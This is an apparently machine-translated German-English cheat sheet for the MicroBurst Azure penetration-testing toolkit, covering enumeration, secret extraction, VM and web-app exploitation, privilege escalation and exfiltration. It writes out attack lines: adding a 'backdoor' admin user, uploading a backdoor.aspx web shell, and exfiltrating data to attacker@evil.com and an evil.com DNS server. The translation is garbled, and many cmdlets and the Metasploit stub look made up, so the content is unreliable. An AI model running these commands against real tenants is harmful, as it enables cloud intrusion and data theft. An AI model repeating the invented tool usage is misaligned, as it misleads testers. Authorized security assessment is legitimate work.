Zum Inhalt

MicroBurst Azure Security Testing Toolkit Cheat Sheet

generieren

Überblick

MicroBurst ist eine Sammlung von PowerShell-Skripten, die von NetSPI für die Bewertung von Microsoft Azure-Sicherheit entwickelt wurden. Es umfasst Werkzeuge für Azure Service Entdeckung, Privileg Eskalation, laterale Bewegung und Daten Exfiltration, so dass es ein umfassendes Toolkit für Azure Penetration Test.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Installation von PowerShell

```powershell

Install from PowerShell Gallery

Install-Module -Name MicroBurst

Install for current user only

Install-Module -Name MicroBurst -Scope CurrentUser

Update existing installation

Update-Module -Name MicroBurst

Import module

Import-Module MicroBurst ```_

Manuelle Installation

```powershell

Download from GitHub

Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip" Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"

Import module

Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1

Install dependencies

Install-Module -Name Az Install-Module -Name AzureAD ```_

Gierinstallation

```bash

Clone repository

git clone https://github.com/NetSPI/MicroBurst.git cd MicroBurst

Import in PowerShell

Import-Module .\MicroBurst.psd1 ```_

Basisnutzung

Modulaufbau

```powershell

Import MicroBurst

Import-Module MicroBurst

Get available commands

Get-Command -Module MicroBurst

Get help for specific function

Get-Help Invoke-EnumerateAzureBlobs -Full

Check module version

Get-Module MicroBurst ```_

Authentication

```powershell

Interactive authentication

Connect-AzAccount

Service principal authentication

$credential = Get-Credential Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"

Certificate authentication

Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id" ```_

Befehlsnummer

Reconnaissance Funktionen

Function Description
Invoke-EnumerateAzureBlobs Enumerate Azure storage blobs
Invoke-EnumerateAzureSubDomains Enumerate Azure subdomains
Get-AzurePasswords Extract passwords from Azure resources
Get-AzureDomainInfo Get domain information
Invoke-AzureRmVmBulkCMD Execute commands on multiple VMs

Funktionen des Speicherkontos

Function Description
Invoke-EnumerateAzureBlobs Find accessible storage blobs
Get-AzureBlobFiles Download files from storage
Invoke-AzureStorageAccountEnum Enumerate storage accounts
Get-AzureStorageAccountKeys Extract storage account keys

Virtuelle Maschinenfunktionen

Function Description
Invoke-AzureRmVmBulkCMD Bulk command execution
Get-AzureVMDisk Access VM disk information
Invoke-AzureVMUserDataEnum Enumerate VM user data
Get-AzureVMExtensionSettings Get VM extension settings

Azure Storage Enumeration

Blob Storage Discovery

```powershell

Basic blob enumeration

Invoke-EnumerateAzureBlobs -Base "company"

Enumerate with custom wordlist

Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"

Enumerate specific containers

Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")

Enumerate with threading

Invoke-EnumerateAzureBlobs -Base "company" -Threads 10 ```_

Speicherkonto Aufzählung

```powershell

Enumerate storage accounts

Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"

Get storage account keys

Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"

Enumerate storage containers

Get-AzureStorageContainers -StorageAccountName "storageaccount"

Download files from storage

Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\" ```_

Datei teilen Enumeration

```powershell

Enumerate file shares

Get-AzureFileShares -StorageAccountName "storageaccount"

Access file share contents

Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"

Download files from file share

Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\" ```_

Subdomain und Service Discovery

Azure Subdomain Enumeration

```powershell

Basic subdomain enumeration

Invoke-EnumerateAzureSubDomains -Base "company"

Enumerate with custom services

Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")

Enumerate with permutations

Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")

Save results to file

Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt" ```_

Service Discovery

```powershell

Discover Azure services

Get-AzureServices -Domain "company.com"

Enumerate web applications

Get-AzureWebApps -SubscriptionId "subscription-id"

Discover SQL databases

Get-AzureSQLDatabases -SubscriptionId "subscription-id"

Find Key Vaults

Get-AzureKeyVaults -SubscriptionId "subscription-id" ```_

DNS Aufzählung

```powershell

Enumerate DNS records

Get-AzureDNSRecords -Domain "company.com"

Check for zone transfers

Test-AzureDNSZoneTransfer -Domain "company.com"

Enumerate subdomains via DNS

Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt" ```_

Virtual Machine Exploitation

VM Befehlsausübung

```powershell

Execute command on single VM

Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"

Execute commands on multiple VMs

$vms = @("vm1", "vm2", "vm3") Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"

Execute PowerShell script on VMs

Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1" ```_

Zugriff auf die Festplatte

```powershell

Get VM disk information

Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"

Create disk snapshot

New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"

Mount disk snapshot

Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"

Extract data from mounted disk

Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\" ```_

VM Erweiterung Exploitation

```powershell

Get VM extension settings

Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"

Install custom extension

Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"

Execute via extension

Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add" ```_

Credential and Secret Extraction

Passwort-Extraktion

```powershell

Extract passwords from Azure resources

Get-AzurePasswords -SubscriptionId "subscription-id"

Extract passwords from specific resource types

Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")

Extract passwords from Key Vaults

Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"

Extract connection strings

Get-AzureConnectionStrings -SubscriptionId "subscription-id" ```_

Zertifikatsextraktion

```powershell

Extract certificates from Key Vault

Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"

Extract certificates from web apps

Get-AzureWebAppCertificates -WebAppName "webapp-name"

Export certificates

Export-AzureCertificates -OutputPath "C:\Certificates\" ```_

Konfiguration Datenextraktion

```powershell

Extract application settings

Get-AzureAppSettings -WebAppName "webapp-name"

Extract environment variables

Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"

Extract deployment credentials

Get-AzureDeploymentCredentials -WebAppName "webapp-name" ```_

Datenbankauswertung

SQL Datenbank Enumeration

```powershell

Enumerate SQL databases

Get-AzureSQLDatabases -SubscriptionId "subscription-id"

Get SQL server information

Get-AzureSQLServerInfo -ServerName "sqlserver-name"

Check SQL firewall rules

Get-AzureSQLFirewallRules -ServerName "sqlserver-name"

Test SQL connectivity

Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name" ```_

Zugriff auf die Datenbank

```powershell

Connect to SQL database

Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred

Execute SQL queries

Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"

Extract database schema

Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"

Dump database data

Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\" ```_

CosmosDB Exploitation

```powershell

Enumerate CosmosDB accounts

Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"

Get CosmosDB keys

Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"

Access CosmosDB data

Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container" ```_

Web Application Exploitation

Web App Aufzählung

```powershell

Enumerate web applications

Get-AzureWebApps -SubscriptionId "subscription-id"

Get web app configuration

Get-AzureWebAppConfig -WebAppName "webapp-name"

Check web app authentication

Get-AzureWebAppAuth -WebAppName "webapp-name"

Get web app deployment slots

Get-AzureWebAppSlots -WebAppName "webapp-name" ```_

Web App Exploitation

```powershell

Access web app files via Kudu

Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"

Execute commands via Kudu

Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"

Upload backdoor file

Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"

Access web app logs

Get-AzureWebAppLogs -WebAppName "webapp-name" ```_

Funktion App Exploitation

```powershell

Enumerate function apps

Get-AzureFunctionApps -SubscriptionId "subscription-id"

Get function app keys

Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"

Execute function

Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload

Access function app files

Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name" ```_

Vorrechte Eskalation

Rollenzuweisung Aufzählung

```powershell

Get current user roles

Get-AzureCurrentUserRoles

Enumerate role assignments

Get-AzureRoleAssignments -SubscriptionId "subscription-id"

Find privilege escalation paths

Find-AzurePrivEscPaths -SubscriptionId "subscription-id"

Check for dangerous permissions

Get-AzureDangerousPermissions -SubscriptionId "subscription-id" ```_

Service Principal Missbrauch

```powershell

Enumerate service principals

Get-AzureServicePrincipals -SubscriptionId "subscription-id"

Get service principal credentials

Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"

Abuse service principal permissions

Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser" ```_

Managed Identity Exploitation

```powershell

Check for managed identity

Test-AzureManagedIdentity

Get managed identity token

Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"

Use managed identity for privilege escalation

Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription" ```_

Spätere Bewegung

Überschrift Zugang

```powershell

Enumerate accessible subscriptions

Get-AzureAccessibleSubscriptions

Switch subscription context

Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"

Enumerate resources in target subscription

Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id" ```_

Cross-Tenant Zugang

```powershell

Enumerate accessible tenants

Get-AzureAccessibleTenants

Switch tenant context

Set-AzureTenantContext -TenantId "target-tenant-id"

Enumerate resources in target tenant

Get-AzureResourcesInTenant -TenantId "target-tenant-id" ```_

Resource Group Pivoting

```powershell

Enumerate resource groups

Get-AzureResourceGroups -SubscriptionId "subscription-id"

Find resources with weak permissions

Find-AzureWeakPermissions -ResourceGroupName "rg-name"

Pivot through resource groups

Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg" ```_

Daten Exfiltration

Massendatenextraktion

```powershell

Extract all accessible data

Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"

Extract specific data types

Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"

Extract with compression

Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress ```_

Stealth Exfiltration

```powershell

Exfiltrate via storage account

Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"

Exfiltrate via email

Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"

Exfiltrate via DNS

Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com" ```_

Automatisierung und Schrift

Automatisierte Beurteilung Script

```powershell

Comprehensive Azure assessment

param( [string]\(SubscriptionId, [string]\)OutputPath = "C:\AzureAssessment" )

Create output directory

New-Item -ItemType Directory -Path $OutputPath -Force

Authenticate

Connect-AzAccount

Set subscription context

Set-AzContext -SubscriptionId $SubscriptionId

Enumerate subdomains

Write-Host "Enumerating subdomains..." $subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name \(subdomains|Out-File "\)OutputPath\subdomains.txt"

Enumerate storage blobs

Write-Host "Enumerating storage blobs..." $blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name \(blobs|Out-File "\)OutputPath\blobs.txt"

Extract passwords

Write-Host "Extracting passwords..." $passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId \(passwords|Export-Csv "\)OutputPath\passwords.csv" -NoTypeInformation

Get VM information

Write-Host "Gathering VM information..." $vms = Get-AzVM \(vms|Export-Csv "\)OutputPath\vms.csv" -NoTypeInformation

Generate summary report

$summary = @\\{ AssessmentDate = Get-Date SubscriptionId = $SubscriptionId SubdomainsFound = $subdomains.Count BlobsFound = $blobs.Count PasswordsFound = $passwords.Count VMsFound = $vms.Count \\}

\(summary|ConvertTo-Json|Out-File "\)OutputPath\summary.json"

Write-Host "Assessment completed. Results saved to $OutputPath" ```_

Kontinuierliche Überwachung

```powershell

Continuous Azure monitoring

param( [int]\(IntervalMinutes = 60, [string]\)LogPath = "C:\AzureMonitoring\monitor.log" )

while ($true) \\{ \(timestamp = Get-Date Write-Output "[\)timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append

try \\\\{
    # Check for new storage accounts
    $newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newStorage) \\\\{
        Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}

    # Check for new VMs
    $newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newVMs) \\\\{
        Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}

    # Check for new role assignments
    $newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newRoles) \\\\{
        Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}
\\\\}
catch \\\\{
    Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}

Start-Sleep -Seconds ($IntervalMinutes * 60)

\\} ```_

Fehlerbehebung

Authentifizierungsfragen

```powershell

Clear cached credentials

Clear-AzContext -Force

Test authentication

$context = Get-AzContext if (-not $context) \\{ Write-Error "Not authenticated to Azure" Connect-AzAccount \\}

Verify subscription access

Get-AzSubscription ```_

Modulfragen

```powershell

Check MicroBurst installation

Get-Module MicroBurst -ListAvailable

Update MicroBurst

Update-Module MicroBurst -Force

Check dependencies

Get-Module Az -ListAvailable ```_

Genehmigungsfragen

```powershell

Check current permissions

$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id $roleAssignments|Select-Object RoleDefinitionName, Scope

Test specific permissions

try \\{ Get-AzStorageAccount -ErrorAction Stop Write-Output "Storage account read permission: OK" \\} catch \\{ Write-Output "Storage account read permission: DENIED" \\} ```_

Integration mit anderen Tools

BlutHound Integration

```powershell

Export data for BloodHound

$azureData = @\\{ users = Get-AzADUser groups = Get-AzADGroup servicePrincipals = Get-AzADServicePrincipal roleAssignments = Get-AzRoleAssignment \\}

Convert to BloodHound format

$bloodhoundData = Convert-AzureToBloodHound -Data $azureData $bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json" ```_

Metasploit Integration

```ruby

Metasploit module for MicroBurst

require 'msf/core'

class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient

def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Azure MicroBurst Integration', 'Description' => 'Execute MicroBurst functions via Metasploit', 'Author' => ['NetSPI'], 'License' => MSF_LICENSE ))

register_options([
  OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
  OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
])

end

def run subscription_id = datastore['SUBSCRIPTION_ID'] function = datastore['FUNCTION']

# Execute MicroBurst function
powershell_cmd = "Import-Module MicroBurst; #\\\\{function\\\\} -SubscriptionId #\\\\{subscription_id\\\\}"

print_status("Executing: #\\\\{powershell_cmd\\\\}")
# Execute PowerShell command

end end ```_

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von MicroBurst. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie Azure Sicherheitsbewertungen durchführen. *